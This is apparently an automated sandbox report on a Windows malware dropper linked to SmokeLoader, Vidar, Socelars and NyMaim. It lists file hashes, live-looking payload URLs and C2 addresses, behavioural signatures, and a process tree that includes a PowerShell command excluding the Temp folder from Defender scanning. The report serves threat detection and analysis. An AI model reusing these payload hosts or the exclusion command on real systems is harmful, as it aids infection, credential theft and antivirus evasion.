lgoogloader | b710c0b327c97e4eac8e88b8618c8b3fa43c0927b485a5a1b2cd49322bdba5b3

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
16-11-2022 13:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b710c0b327c97e4eac8e88b8618c8b3fa43c0927b485a5a1b2cd49322bdba5b3.exe
Size

5.7MB
MD5

719bfa2770808b23f310634cc8346049
SHA1

c1150ead98af374c18a5f9d73d55dc59f1b990f8
SHA256

b710c0b327c97e4eac8e88b8618c8b3fa43c0927b485a5a1b2cd49322bdba5b3
SHA512

218733adad44ff8f814379b62cdf7ad619efca070c3a7c310d861980b22f63b51d2793b55a7f26d70a8a8714247e35ff1a4737b998bad3cb3c54c5a0d4d360b7
SSDEEP

98304:x6x3btqjPdjA+95YipQDR9rqQr0nRgQBL/NIPncs+6L4rDQB108R4eXF2bocB/SY:x6xL4j1jAuY4QXqm0Rg6DifiM708hSow

Score

10^/10

lgoogloader nymaim smokeloader socelars vidar 915 backdoor downloader evasion persistence spyware stealer trojan vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.conectiva.pe/doc/config_40.ps1

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ndtpro.xyz/nj/config_40.ps1

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://efeedor.com/blog/assets/config_40.ps1

Extracted

Family

socelars

https://hdbywe.s3.us-west-2.amazonaws.com/sadew1013/

Extracted

Family

nymaim

45.139.105.171

85.31.46.167

Extracted

Family

vidar

Version

55.5

Botnet

915

https://t.me/tg_turgay

https://ioc.exchange/@xiteb15011

Attributes

profile_id
915

Signatures

Detects LgoogLoader payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3860-193-0x00000000007C0000-0x00000000007ED000-memory.dmp	family_lgoogloader

Detects Smokeloader packer 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3480-198-0x00000000006E0000-0x00000000006E9000-memory.dmp	family_smokeloader
behavioral2/memory/3600-201-0x0000000000400000-0x0000000000409000-memory.dmp	family_smokeloader
behavioral2/memory/3600-190-0x0000000000400000-0x0000000000409000-memory.dmp	family_smokeloader
behavioral2/memory/3600-250-0x0000000000400000-0x0000000000409000-memory.dmp	family_smokeloader

LgoogLoader
A downloader capable of dropping and executing other malware families.
downloader lgoogloader
NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	29364	5044	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5460	5044	rundll32.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daa7d6897_a0d8ae7feb.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daa7d6897_a0d8ae7feb.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

62 15308 powershell.exe
66 9364 powershell.exe
70 1364 powershell.exe
74 15308 powershell.exe
84 9364 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

PowerOff.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts PowerOff.exe

flow	pid	process
62	15308	powershell.exe
66	9364	powershell.exe
70	1364	powershell.exe
74	15308	powershell.exe
84	9364	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	PowerOff.exe

Executes dropped EXE 26 IoCs

Processes:

setup_install.exe6368daa6531b5_e1a29ac.exe6368daa709d64_5cde43f.exe6368daa76532c_c5c6da.exe6368daaad0766_61fff63e.exe6368daa7d6897_a0d8ae7feb.exe6368daa937cb8_bfd3ed4d.exe6368daabedc01_cd9ff84ca.exe6368daaff2693_0808cb0878.exe6368daadec736_b018adb.exe6368daaad0766_61fff63e.exe6368daabedc01_cd9ff84ca.tmp6368daa6531b5_e1a29ac.exe6368dae9d03d2_c1e9ecee.exe6368dab1e79de_14526e0fb0.exe6368daeb7b488_2f09cc.exe6368daecf26a4_6426872a.exe6368daee3bb65_7f03c6.exePowerOff.exeMidaejisowy.exeRoqeceshije.exeGcleanerEU.exegcleaner.exerandom.exepb1117.exerandom.exe

pid	process
1360	setup_install.exe
4472	6368daa6531b5_e1a29ac.exe
696	6368daa709d64_5cde43f.exe
2372	6368daa76532c_c5c6da.exe
3480	6368daaad0766_61fff63e.exe
3136	6368daa7d6897_a0d8ae7feb.exe
4736	6368daa937cb8_bfd3ed4d.exe
1384	6368daabedc01_cd9ff84ca.exe
3860	6368daaff2693_0808cb0878.exe
3452	6368daadec736_b018adb.exe
3600	6368daaad0766_61fff63e.exe
4340	6368daabedc01_cd9ff84ca.tmp
1320	6368daa6531b5_e1a29ac.exe
960	6368dae9d03d2_c1e9ecee.exe
4740	6368dab1e79de_14526e0fb0.exe
4436	6368daeb7b488_2f09cc.exe
8348	6368daecf26a4_6426872a.exe
8360	6368daee3bb65_7f03c6.exe
15136	PowerOff.exe
48712	Midaejisowy.exe
48732	Roqeceshije.exe
87860	GcleanerEU.exe
87948	gcleaner.exe
87528	random.exe
2584	pb1117.exe
4032	random.exe

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/2584-336-0x0000000140000000-0x0000000140615000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6368dae9d03d2_c1e9ecee.exePowerOff.exegcleaner.exeb710c0b327c97e4eac8e88b8618c8b3fa43c0927b485a5a1b2cd49322bdba5b3.exe6368daa76532c_c5c6da.exe6368daee3bb65_7f03c6.exe6368daecf26a4_6426872a.exeMidaejisowy.exe6368daa937cb8_bfd3ed4d.exerandom.exeGcleanerEU.exe6368daa6531b5_e1a29ac.exe6368daeb7b488_2f09cc.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	6368dae9d03d2_c1e9ecee.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	PowerOff.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	gcleaner.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	b710c0b327c97e4eac8e88b8618c8b3fa43c0927b485a5a1b2cd49322bdba5b3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	6368daa76532c_c5c6da.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	6368daee3bb65_7f03c6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	6368daecf26a4_6426872a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Midaejisowy.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	6368daa937cb8_bfd3ed4d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	GcleanerEU.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	6368daa6531b5_e1a29ac.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	6368daeb7b488_2f09cc.exe

Loads dropped DLL 9 IoCs

Processes:

setup_install.exe6368daabedc01_cd9ff84ca.tmprundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exe

pid	process
1360	setup_install.exe
4340	6368daabedc01_cd9ff84ca.tmp
2312	rundll32.exe
2952	rundll32.exe
29400	rundll32.exe
87568	rundll32.exe
87568	rundll32.exe
87980	rundll32.exe
5488	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

PowerOff.exemsedge.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Nytyshozhupu.exe\""	PowerOff.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 2 IoCs

Processes:

6368daaad0766_61fff63e.exe6368dab1e79de_14526e0fb0.exe

description	pid	process	target process
PID 3480 set thread context of 3600	3480	6368daaad0766_61fff63e.exe	6368daaad0766_61fff63e.exe
PID 4740 set thread context of 87424	4740	6368dab1e79de_14526e0fb0.exe	AppLaunch.exe

Drops file in Program Files directory 15 IoCs

Processes:

6368daa7d6897_a0d8ae7feb.exePowerOff.exesetup.exe

description	ioc	process
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\aes.js	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files (x86)\Windows Sidebar\Nytyshozhupu.exe.config	PowerOff.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\background.html	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\icon.png	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js	6368daa7d6897_a0d8ae7feb.exe
File opened for modification	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\c64b4495-0792-4289-a7f4-423a0add83cb.tmp	setup.exe
File created	C:\Program Files (x86)\Windows Sidebar\Nytyshozhupu.exe	PowerOff.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\jquery-3.3.1.min.js	6368daa7d6897_a0d8ae7feb.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221116143728.pma	setup.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\content.js	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\mode-ecb.js	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\pad-nopadding.js	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\manifest.json	6368daa7d6897_a0d8ae7feb.exe
File created	C:\Program Files\Mozilla Firefox\PFYAWRYPPM\irecord.exe	PowerOff.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 31 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
8328	3452	WerFault.exe	6368daadec736_b018adb.exe
15292	4736	WerFault.exe	6368daa937cb8_bfd3ed4d.exe
20416	4736	WerFault.exe	6368daa937cb8_bfd3ed4d.exe
38036	4736	WerFault.exe	6368daa937cb8_bfd3ed4d.exe
49068	29400	WerFault.exe	rundll32.exe
62436	4736	WerFault.exe	6368daa937cb8_bfd3ed4d.exe
69348	4736	WerFault.exe	6368daa937cb8_bfd3ed4d.exe
79500	4736	WerFault.exe	6368daa937cb8_bfd3ed4d.exe
87556	4736	WerFault.exe	6368daa937cb8_bfd3ed4d.exe
87824	4740	WerFault.exe	6368dab1e79de_14526e0fb0.exe
2656	4736	WerFault.exe	6368daa937cb8_bfd3ed4d.exe
87680	87860	WerFault.exe	GcleanerEU.exe
4876	4736	WerFault.exe	6368daa937cb8_bfd3ed4d.exe
3968	87948	WerFault.exe	gcleaner.exe
3960	87860	WerFault.exe	GcleanerEU.exe
220	87948	WerFault.exe	gcleaner.exe
5132	87860	WerFault.exe	GcleanerEU.exe
5280	87948	WerFault.exe	gcleaner.exe
5404	87860	WerFault.exe	GcleanerEU.exe
5448	87948	WerFault.exe	gcleaner.exe
5548	5488	WerFault.exe	rundll32.exe
5608	87948	WerFault.exe	gcleaner.exe
5656	87860	WerFault.exe	GcleanerEU.exe
5728	87948	WerFault.exe	gcleaner.exe
5788	87860	WerFault.exe	GcleanerEU.exe
5848	87948	WerFault.exe	gcleaner.exe
5912	87860	WerFault.exe	GcleanerEU.exe
5980	87948	WerFault.exe	gcleaner.exe
6032	87860	WerFault.exe	GcleanerEU.exe
6128	87948	WerFault.exe	gcleaner.exe
6252	87860	WerFault.exe	GcleanerEU.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

6368daaad0766_61fff63e.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6368daaad0766_61fff63e.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6368daaad0766_61fff63e.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6368daaad0766_61fff63e.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

49436 taskkill.exe
1084 taskkill.exe
6160 taskkill.exe
6308 taskkill.exe

pid	process
49436	taskkill.exe
1084	taskkill.exe
6160	taskkill.exe
6308	taskkill.exe

Modifies registry class 6 IoCs

Processes:

6368daecf26a4_6426872a.exe6368daee3bb65_7f03c6.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	6368daecf26a4_6426872a.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	6368daee3bb65_7f03c6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

29340 PING.EXE
69220 PING.EXE
69452 PING.EXE

pid	process
29340	PING.EXE
69220	PING.EXE
69452	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	36	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	144	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6368daaad0766_61fff63e.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3600	6368daaad0766_61fff63e.exe
3600	6368daaad0766_61fff63e.exe
4792	powershell.exe
4792	powershell.exe
4792	powershell.exe
4792	powershell.exe
15308	powershell.exe
15308	powershell.exe
9364	powershell.exe
9364	powershell.exe
1364	powershell.exe
1364	powershell.exe
684
684
684
684
684
684
684
684
684
684
684
684
684
684
684
684
684
684
684
684
684
684
15308	powershell.exe
15308	powershell.exe
684
684
684
684
684
684
684
684
684
684
684
684
9364	powershell.exe
9364	powershell.exe
684
684
684
684
1364	powershell.exe
1364	powershell.exe
684
684
684
684
684
684
684
684

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

6368daaad0766_61fff63e.exe

pid process

3600 6368daaad0766_61fff63e.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

87720 msedge.exe
87720 msedge.exe
87720 msedge.exe
87720 msedge.exe
87720 msedge.exe

pid	process
87720	msedge.exe
87720	msedge.exe
87720	msedge.exe
87720	msedge.exe
87720	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

6368daa7d6897_a0d8ae7feb.exepowershell.exePowerOff.exepowershell.exepowershell.exepowershell.exetaskkill.exe

description	pid	process
Token: SeCreateTokenPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeAssignPrimaryTokenPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeLockMemoryPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeIncreaseQuotaPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeMachineAccountPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeTcbPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeSecurityPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeTakeOwnershipPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeLoadDriverPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeSystemProfilePrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeSystemtimePrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeProfSingleProcessPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeIncBasePriorityPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeCreatePagefilePrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeCreatePermanentPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeBackupPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeRestorePrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeShutdownPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeDebugPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeAuditPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeSystemEnvironmentPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeChangeNotifyPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeRemoteShutdownPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeUndockPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeSyncAgentPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeEnableDelegationPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeManageVolumePrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeImpersonatePrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeCreateGlobalPrivilege	3136	6368daa7d6897_a0d8ae7feb.exe
Token: 31	3136	6368daa7d6897_a0d8ae7feb.exe
Token: 32	3136	6368daa7d6897_a0d8ae7feb.exe
Token: 33	3136	6368daa7d6897_a0d8ae7feb.exe
Token: 34	3136	6368daa7d6897_a0d8ae7feb.exe
Token: 35	3136	6368daa7d6897_a0d8ae7feb.exe
Token: SeDebugPrivilege	4792	powershell.exe
Token: SeDebugPrivilege	15136	PowerOff.exe
Token: SeDebugPrivilege	15308	powershell.exe
Token: SeDebugPrivilege	9364	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684
Token: SeDebugPrivilege	49436	taskkill.exe
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684
Token: SeShutdownPrivilege	684
Token: SeCreatePagefilePrivilege	684

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

msedge.exe

pid process

87720 msedge.exe
684
684
87720 msedge.exe
684
87720 msedge.exe
684
684
684
684

pid	process
87720	msedge.exe
684
684
87720	msedge.exe
684
87720	msedge.exe
684
684
684
684

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b710c0b327c97e4eac8e88b8618c8b3fa43c0927b485a5a1b2cd49322bdba5b3.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4656 wrote to memory of 1360	4656	b710c0b327c97e4eac8e88b8618c8b3fa43c0927b485a5a1b2cd49322bdba5b3.exe	setup_install.exe
PID 4656 wrote to memory of 1360	4656	b710c0b327c97e4eac8e88b8618c8b3fa43c0927b485a5a1b2cd49322bdba5b3.exe	setup_install.exe
PID 4656 wrote to memory of 1360	4656	b710c0b327c97e4eac8e88b8618c8b3fa43c0927b485a5a1b2cd49322bdba5b3.exe	setup_install.exe
PID 1360 wrote to memory of 5004	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 5004	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 5004	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 3576	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 3576	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 3576	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4924	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4924	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4924	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4864	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4864	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4864	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4808	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4808	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4808	1360	setup_install.exe	cmd.exe
PID 5004 wrote to memory of 4792	5004	cmd.exe	powershell.exe
PID 5004 wrote to memory of 4792	5004	cmd.exe	powershell.exe
PID 5004 wrote to memory of 4792	5004	cmd.exe	powershell.exe
PID 1360 wrote to memory of 4280	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4280	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4280	1360	setup_install.exe	cmd.exe
PID 3576 wrote to memory of 4472	3576	cmd.exe	6368daa6531b5_e1a29ac.exe
PID 3576 wrote to memory of 4472	3576	cmd.exe	6368daa6531b5_e1a29ac.exe
PID 3576 wrote to memory of 4472	3576	cmd.exe	6368daa6531b5_e1a29ac.exe
PID 4924 wrote to memory of 696	4924	cmd.exe	6368daa709d64_5cde43f.exe
PID 4924 wrote to memory of 696	4924	cmd.exe	6368daa709d64_5cde43f.exe
PID 4864 wrote to memory of 2372	4864	cmd.exe	6368daa76532c_c5c6da.exe
PID 4864 wrote to memory of 2372	4864	cmd.exe	6368daa76532c_c5c6da.exe
PID 4864 wrote to memory of 2372	4864	cmd.exe	6368daa76532c_c5c6da.exe
PID 1360 wrote to memory of 2044	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 2044	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 2044	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 1288	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 1288	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 1288	1360	setup_install.exe	cmd.exe
PID 2044 wrote to memory of 3480	2044	cmd.exe	6368daaad0766_61fff63e.exe
PID 2044 wrote to memory of 3480	2044	cmd.exe	6368daaad0766_61fff63e.exe
PID 2044 wrote to memory of 3480	2044	cmd.exe	6368daaad0766_61fff63e.exe
PID 1360 wrote to memory of 2864	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 2864	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 2864	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4944	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4944	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4944	1360	setup_install.exe	cmd.exe
PID 4808 wrote to memory of 3136	4808	cmd.exe	6368daa7d6897_a0d8ae7feb.exe
PID 4808 wrote to memory of 3136	4808	cmd.exe	6368daa7d6897_a0d8ae7feb.exe
PID 4808 wrote to memory of 3136	4808	cmd.exe	6368daa7d6897_a0d8ae7feb.exe
PID 4280 wrote to memory of 4736	4280	cmd.exe	6368daa937cb8_bfd3ed4d.exe
PID 4280 wrote to memory of 4736	4280	cmd.exe	6368daa937cb8_bfd3ed4d.exe
PID 4280 wrote to memory of 4736	4280	cmd.exe	6368daa937cb8_bfd3ed4d.exe
PID 1360 wrote to memory of 2184	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 2184	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 2184	1360	setup_install.exe	cmd.exe
PID 1288 wrote to memory of 1384	1288	cmd.exe	6368daabedc01_cd9ff84ca.exe
PID 1288 wrote to memory of 1384	1288	cmd.exe	6368daabedc01_cd9ff84ca.exe
PID 1288 wrote to memory of 1384	1288	cmd.exe	6368daabedc01_cd9ff84ca.exe
PID 4944 wrote to memory of 3860	4944	cmd.exe	6368daaff2693_0808cb0878.exe
PID 4944 wrote to memory of 3860	4944	cmd.exe	6368daaff2693_0808cb0878.exe
PID 4944 wrote to memory of 3860	4944	cmd.exe	6368daaff2693_0808cb0878.exe
PID 1360 wrote to memory of 4360	1360	setup_install.exe	cmd.exe
PID 1360 wrote to memory of 4360	1360	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\b710c0b327c97e4eac8e88b8618c8b3fa43c0927b485a5a1b2cd49322bdba5b3.exe
"C:\Users\Admin\AppData\Local\Temp\b710c0b327c97e4eac8e88b8618c8b3fa43c0927b485a5a1b2cd49322bdba5b3.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4656

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS03226E76\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
3⤵
- Suspicious use of WriteProcessMemory
PID:5004

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daa6531b5_e1a29ac.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3576

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daa6531b5_e1a29ac.exe
